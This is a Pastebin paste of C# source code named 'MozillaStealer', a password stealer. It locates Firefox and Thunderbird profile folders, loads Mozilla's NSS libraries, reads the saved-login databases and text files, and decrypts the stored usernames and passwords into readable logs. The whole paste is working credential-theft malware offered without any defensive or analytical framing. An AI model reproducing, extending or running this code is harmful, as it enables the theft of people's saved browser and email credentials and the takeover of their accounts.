Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.IO;
- using System.Runtime.InteropServices;
- using System.Data;
- using System.Text;
- using System.Threading;
- using System.Reflection;
- using System.ComponentModel;
- using System.Collections;
- namespace MozillaStealer {
- static class Stealer {
- [StructLayout(LayoutKind.Sequential)]
- private struct TSECItem {
- public int SECItemType;
- public int SECItemData;
- public int SECItemLen;
- }
- private static IntPtr NSS3;
- static string RealProgramFiles()
- {
- if (8 == IntPtr.Size || (!String.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432"))))
- {
- return Environment.GetEnvironmentVariable("ProgramFiles(x86)");
- }
- return Environment.GetEnvironmentVariable("ProgramFiles");
- }
- [DllImport("kernel32.dll")]
- static extern IntPtr LoadLibraryEx(string lpFileName, IntPtr hFile, uint dwFlags);
- [DllImport("kernel32.dll")]
- static extern IntPtr LoadLibrary(string lpFileName);
- [DllImport("kernel32.dll")]
- static extern IntPtr FreeLibrary(string lpFileName);
- [DllImport("kernel32.dll")]
- public extern static IntPtr GetProcAddress(int hwnd, string procedureName);
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate long DLLFunctionDelegate(string configdir);
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate long DLLFunctionDelegate2();
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate long DLLFunctionDelegate3(long slot, bool loadCerts, long wincx);
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate int DLLFunctionDelegate4(IntPtr arenaOpt, IntPtr outItemOpt, StringBuilder inStr, int inLen);
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate int DLLFunctionDelegate5(ref TSECItem data, ref TSECItem result, int cx);
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate int DLLFunctionDelegate6(long slot);
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate int DLLFunctionDelegate7(ref TSECItem item, bool freeItem);
- private static long PK11_GetInternalKeySlot()
- {
- IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11_GetInternalKeySlot");
- DLLFunctionDelegate2 dll = (DLLFunctionDelegate2)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate2));
- return dll();
- }
- private static long NSS_Init(string configdir, string program)
- {
- try
- {
- string MozillaPath = RealProgramFiles() + program;
- DLLFunctionDelegate dll = null;
- LoadLibrary(MozillaPath + "mozcrt19.dll");
- LoadLibrary(MozillaPath + "nspr4.dll");
- LoadLibrary(MozillaPath + "plc4.dll");
- LoadLibrary(MozillaPath + "plds4.dll");
- LoadLibrary(MozillaPath + "ssutil3.dll");
- LoadLibrary(MozillaPath + "sqlite3.dll");
- LoadLibrary(MozillaPath + "nssutil3.dll");
- LoadLibrary(MozillaPath + "softokn3.dll");
- NSS3 = LoadLibrary(MozillaPath + "nss3.dll");
- IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "NSS_Init");
- dll = (DLLFunctionDelegate)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate));
- return dll(configdir);
- }
- catch
- {
- return 0;
- }
- }
- private static long NSS_Cleanup(string configdir, string program)
- {
- try
- {
- string MozillaPath = RealProgramFiles() + program;
- IntPtr pProc1 = GetProcAddress(NSS3.ToInt32(), "NSS_Shutdown");
- DLLFunctionDelegate dll1 = (DLLFunctionDelegate)Marshal.GetDelegateForFunctionPointer(pProc1, typeof(DLLFunctionDelegate));
- dll1("test");
- FreeLibrary(MozillaPath + "mozcrt19.dll");
- FreeLibrary(MozillaPath + "nspr4.dll");
- FreeLibrary(MozillaPath + "plc4.dll");
- FreeLibrary(MozillaPath + "plds4.dll");
- FreeLibrary(MozillaPath + "ssutil3.dll");
- FreeLibrary(MozillaPath + "sqlite3.dll");
- FreeLibrary(MozillaPath + "nssutil3.dll");
- FreeLibrary(MozillaPath + "softokn3.dll");
- FreeLibrary(MozillaPath + "nss3.dll");
- NSS3 = IntPtr.Zero;
- return 1;
- }
- catch
- {
- return 0;
- }
- }
- private static long PK11_Authenticate(long slot, bool loadCerts, long wincx)
- {
- IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11_Authenticate");
- DLLFunctionDelegate3 dll = (DLLFunctionDelegate3)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate3));
- return dll(slot, loadCerts, wincx);
- }
- private static int PK11_FreeSlot(long slot)
- {
- IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11_FreeSlot");
- DLLFunctionDelegate6 dll = (DLLFunctionDelegate6)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate6));
- return dll(slot);
- }
- private static int SECItem_FreeItem(ref TSECItem item, bool freeItem)
- {
- IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "SECItem_FreeItem");
- DLLFunctionDelegate7 dll = (DLLFunctionDelegate7)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate7));
- return dll(ref item, freeItem);
- }
- private static int NSSBase64_DecodeBuffer(IntPtr arenaOpt, IntPtr outItemOpt, StringBuilder inStr, int inLen) {
- IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "NSSBase64_DecodeBuffer");
- DLLFunctionDelegate4 dll = (DLLFunctionDelegate4)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate4));
- return dll(arenaOpt, outItemOpt, inStr, inLen);
- }
- private static int PK11SDR_Decrypt(ref TSECItem data, ref TSECItem result, int cx) {
- IntPtr pProc = GetProcAddress(NSS3.ToInt32(), "PK11SDR_Decrypt");
- DLLFunctionDelegate5 dll = (DLLFunctionDelegate5)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate5));
- return dll(ref data, ref result, cx);
- }
- private static string Decrypt(string value) {
- new TSECItem();
- TSECItem tSecDec = new TSECItem();
- byte[] bvRet;
- StringBuilder se = new StringBuilder(value);
- int tValue = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se, se.Length);
- if(tValue != 0) {
- TSECItem item = (TSECItem)Marshal.PtrToStructure(new IntPtr(tValue), typeof(TSECItem));
- if(PK11SDR_Decrypt(ref item, ref tSecDec, 0) == 0) {
- if(tSecDec.SECItemLen != 0) {
- bvRet = new byte[tSecDec.SECItemLen];
- Marshal.Copy(new IntPtr(tSecDec.SECItemData), bvRet, 0, tSecDec.SECItemLen);
- return Encoding.ASCII.GetString(bvRet);
- }
- }
- SECItem_FreeItem(ref item, true);
- }
- return string.Empty;
- }
- private static string GetSQLEntrys(string signon)
- {
- string Log = string.Empty;
- SQLiteBase db = new SQLiteBase(signon);
- DataTable hostTable = db.ExecuteQuery("SELECT hostname FROM moz_disabledHosts;");
- DataTable logins = db.ExecuteQuery("SELECT hostname,encryptedUsername,encryptedPassword FROM moz_logins;");
- foreach (DataRow row in hostTable.Rows)
- {
- Log += "No_Saved: " + row.ToString() + "\n";
- }
- try
- {
- long KeySlot = PK11_GetInternalKeySlot();
- PK11_Authenticate(KeySlot, true, 0);
- }
- catch { }
- foreach (DataRow row in logins.Rows)
- {
- Log += "URL: " + row[0].ToString() + " | ";
- Log += "User: " + Decrypt(row[1].ToString()) + " | ";
- Log += "Password: " + Decrypt(row[2].ToString()) + " |\n";
- Thread.Sleep(500);
- }
- return Log;
- }
- private static ArrayList GetSQLEntrys(string signon, bool Parsed)
- {
- string[] Log = new string[3];
- ArrayList returnArray = new ArrayList();
- SQLiteBase db = new SQLiteBase(signon);
- DataTable logins = db.ExecuteQuery("SELECT hostname,encryptedUsername,encryptedPassword FROM moz_logins;");
- long KeySlot = 0;
- try
- {
- KeySlot = PK11_GetInternalKeySlot();
- PK11_Authenticate(KeySlot, true, 0);
- }
- catch { }
- foreach (DataRow row in logins.Rows)
- {
- Log[0] = row[0].ToString();
- Log[1] = Decrypt(row[1].ToString());
- Log[2] = Decrypt(row[2].ToString());
- returnArray.Add(Log);
- Log = new string[3];
- Thread.Sleep(50);
- }
- try
- {
- PK11_FreeSlot(KeySlot);
- }
- catch { }
- return returnArray;
- }
- private static string GetTXTEntrys(string path)
- {
- string Log = string.Empty;
- StreamReader signonFile = new StreamReader(path);
- signonFile.ReadLine();
- string line = string.Empty;
- long KeySlot = PK11_GetInternalKeySlot();
- PK11_Authenticate(KeySlot, true, 0);
- while ((line = signonFile.ReadLine()) != ".")
- {
- Log += "No_Save: " + line + "\n";
- }
- line = signonFile.ReadLine();
- while (line != null && line != string.Empty)
- {
- Log += "Url: " + line + " | ";
- line = signonFile.ReadLine();
- while (line != null && line != ".")
- {
- line = signonFile.ReadLine();
- Log += "User: " + Decrypt(line) + " | ";
- signonFile.ReadLine();
- line = signonFile.ReadLine();
- if (line.StartsWith("~"))
- {
- line = line.Substring(1);
- }
- Log += "Password: " + Decrypt(line) + "\n";
- if (path.Contains("signons2.txt"))
- {
- signonFile.ReadLine();
- }
- if (path.Contains("signons3.txt"))
- {
- signonFile.ReadLine();
- signonFile.ReadLine();
- }
- }
- line = signonFile.ReadLine();
- }
- return Log;
- }
- private static ArrayList GetTXTEntrys(string path, bool Parsed)
- {
- ArrayList returnArray = new ArrayList();
- StreamReader signonFile = new StreamReader(path);
- signonFile.ReadLine();
- string line = string.Empty;
- long KeySlot = PK11_GetInternalKeySlot();
- PK11_Authenticate(KeySlot, true, 0);
- line = signonFile.ReadLine();
- string[] Log = new string[3];
- while (line != null && line != string.Empty)
- {
- Log[0] = "Url: " + line + " | ";
- line = signonFile.ReadLine();
- while (line != null && line != ".")
- {
- line = signonFile.ReadLine();
- Log[1] = "User: " + Decrypt(line) + " | ";
- signonFile.ReadLine();
- line = signonFile.ReadLine();
- if (line.StartsWith("~"))
- {
- line = line.Substring(1);
- }
- Log[2] = "Password: " + Decrypt(line) + "\n";
- returnArray.Add(Log);
- Log = new string[3];
- if (path.Contains("signons2.txt"))
- {
- signonFile.ReadLine();
- }
- if (path.Contains("signons3.txt"))
- {
- signonFile.ReadLine();
- signonFile.ReadLine();
- }
- }
- line = signonFile.ReadLine();
- }
- return returnArray;
- }
- public static ArrayList GetMozillaThunderbirdPass()
- {
- ArrayList log = new ArrayList();
- string thunderbirdPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Thunderbird\Profiles";
- try
- {
- string[] dirs = Directory.GetDirectories(thunderbirdPath);
- foreach (string dir in dirs)
- {
- string[] files = Directory.GetFiles(dir);
- foreach (string file in files)
- {
- if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
- {
- NSS_Init(dir, @"\Mozilla Thunderbird\");
- log = GetSQLEntrys(dir + @"\signons.sqlite", true);
- NSS_Cleanup(dir, @"\Mozilla Thunderbird\");
- break;
- }
- }
- }
- }
- catch { };
- return log;
- }
- public static ArrayList GetMozillaFirefoxPass()
- {
- ArrayList log = new ArrayList();
- string firefoxPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\Profiles";
- try
- {
- string[] dirs = Directory.GetDirectories(firefoxPath);
- foreach (string dir in dirs)
- {
- string[] files = Directory.GetFiles(dir);
- foreach (string file in files)
- {
- if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
- {
- NSS_Init(dir, @"\Mozilla Firefox\");
- log = GetSQLEntrys(dir + @"\signons.sqlite", true);
- NSS_Cleanup(dir, @"\Mozilla Firefox\");
- break;
- }
- else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.txt"))
- {
- NSS_Init(dir, @"\Mozilla Firefox\");
- log = GetTXTEntrys(dir + @"\signons.txt", true);
- NSS_Cleanup(dir, @"\Mozilla Firefox\");
- break;
- }
- else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons2.txt"))
- {
- NSS_Init(dir, @"\Mozilla Firefox\");
- log = GetTXTEntrys(dir + @"\signons2.txt", true);
- NSS_Cleanup(dir, @"\Mozilla Firefox\");
- break;
- }
- else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons3.txt"))
- {
- NSS_Init(dir, @"\Mozilla Firefox\");
- log = GetTXTEntrys(dir + @"\signons3.txt", true);
- NSS_Cleanup(dir, @"\Mozilla Firefox\");
- break;
- }
- }
- }
- }
- catch (Exception x) { Console.WriteLine(x.Message); };
- return log;
- }
- public static string GetMozillaPass()
- {
- string log = string.Empty;
- string firefoxPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\Profiles";
- string thunderbirdPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Thunderbird\Profiles";
- try
- {
- string[] dirs = Directory.GetDirectories(thunderbirdPath);
- foreach (string dir in dirs)
- {
- string[] files = Directory.GetFiles(dir);
- foreach (string file in files)
- {
- if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
- {
- NSS_Init(dir, @"\Mozilla Thunderbird\");
- log += GetSQLEntrys(dir + @"\signons.sqlite");
- break;
- }
- }
- }
- }
- catch { };
- try
- {
- string[] dirs = Directory.GetDirectories(firefoxPath);
- foreach (string dir in dirs)
- {
- string[] files = Directory.GetFiles(dir);
- foreach (string file in files)
- {
- if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.sqlite"))
- {
- NSS_Init(dir, @"\Mozilla Firefox\");
- log += GetSQLEntrys(dir + @"\signons.sqlite");
- break;
- }
- else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons.txt"))
- {
- NSS_Init(dir, @"\Mozilla Firefox\");
- log += GetTXTEntrys(dir + @"\signons.txt");
- break;
- }
- else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons2.txt"))
- {
- NSS_Init(dir, @"\Mozilla Firefox\");
- log += GetTXTEntrys(dir + @"\signons2.txt");
- break;
- }
- else if (System.Text.RegularExpressions.Regex.IsMatch(file, "signons3.txt"))
- {
- NSS_Init(dir, @"\Mozilla Firefox\");
- log += GetTXTEntrys(dir + @"\signons3.txt");
- break;
- }
- }
- }
- }
- catch (Exception x) { Console.WriteLine(x.Message); };
- return log;
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement